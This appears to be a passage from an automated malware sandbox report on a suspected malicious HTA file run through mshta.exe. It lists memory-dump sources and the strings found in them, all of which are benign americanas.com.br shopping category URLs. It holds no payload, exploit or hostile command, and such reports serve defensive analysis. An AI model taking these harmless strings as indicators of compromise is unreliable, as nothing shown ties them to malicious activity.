mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidas
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bomboniere?chave=pc_cat_menu_bombiniere_mercado
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670798916.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_home_depart_mercado
Source: mshta.exe, 00000000.00000002.2776588517.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749644563.000000000AA58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775247282.000000000AA60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655457107.000000000AA4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_menu_mercado
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moda?chave=pfm_home_moda_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_cama
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/colchao?chave=pfm_hm_tt_1_0_colchao
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-compacta?chave=pfm_hm_tt_1_0_cozinha-compacta
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-modulada?chave=pfm_hm_tt_1_0_cozinha-modulada
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/cadeiras-para-escritorio
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/mesas-para-escritorio
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775912895.000000000C0A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/poltrona?chave=pfm_hm_tt_1_0_poltrona
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-completo?chave=pfm_hm_tt_1_0_quarto-completo
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-e-colchao/guarda-roupa
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/cadeira?chave=pfm_hm_tt_1_0_cadeira
